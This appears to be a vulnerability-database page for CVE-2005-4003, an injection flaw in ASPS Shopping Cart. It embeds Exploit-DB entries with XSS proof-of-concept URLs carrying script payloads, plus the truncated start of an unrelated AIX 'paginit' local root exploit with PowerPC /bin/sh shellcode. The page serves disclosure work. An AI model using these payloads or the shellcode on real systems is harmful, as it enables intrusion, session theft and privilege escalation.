CVE-2005-4003
published 2005-12-05CVE-2005-4003: Multiple SQL injection vulnerabilities in Absolute Shopping Package Solutions (ASPS) Shopping Cart Professional 2.9d and earlier, and Lite 2.1 and earlier…
PriorityP335high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
60.0th percentile
Multiple SQL injection vulnerabilities in Absolute Shopping Package Solutions (ASPS) Shopping Cart Professional 2.9d and earlier, and Lite 2.1 and earlier, allow remote attackers to execute arbitrary SQL commands via the (1) srch_product_name parameter to adv_search.asp and (2) b_search parameter to bsearch.asp. NOTE: the original disclosure was specifically only for an XSS issue, but the CVE description was for SQL injection. Since the original disclosure, SQL injection vectors have been reported. This CVE might be REJECTed or significantly altered pending additional information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asps | shopping_cart | — | — |
| asps | shopping_cart | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting
exploitdb·2005-12-03
CVE-2005-4003 ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting
ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/15694/info
ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/products/adv_search.asp?srch_product_name=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&srch_product_price1=&srch_product_price2=&srch_product_stocknumber=&srch_product_category=&adva
Exploit-DB
ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting
exploitdb·2005-12-03
CVE-2005-4003 ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting
ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/15694/info
ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.
http://www.example.com/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7
Exploit-DB
AIX 5.2 - 'paginit' Local Privilege Escalation
exploitdb·2005-06-14
CVE-2005-2236 AIX 5.2 - 'paginit' Local Privilege Escalation
AIX 5.2 - 'paginit' Local Privilege Escalation
---
/*
*
* IBM AIX paginit root exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy caughq.org)
*
*/
#include
#include
#include
#include
#define DEBUG 1
#define BUFFERSIZE 8000
#define EGGSIZE 4003
#define NOP 0x60
#define ADDRESS 0x2ff22fff-EGGSIZE
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,c
No writeups or analysis indexed.
2005-12-05
Published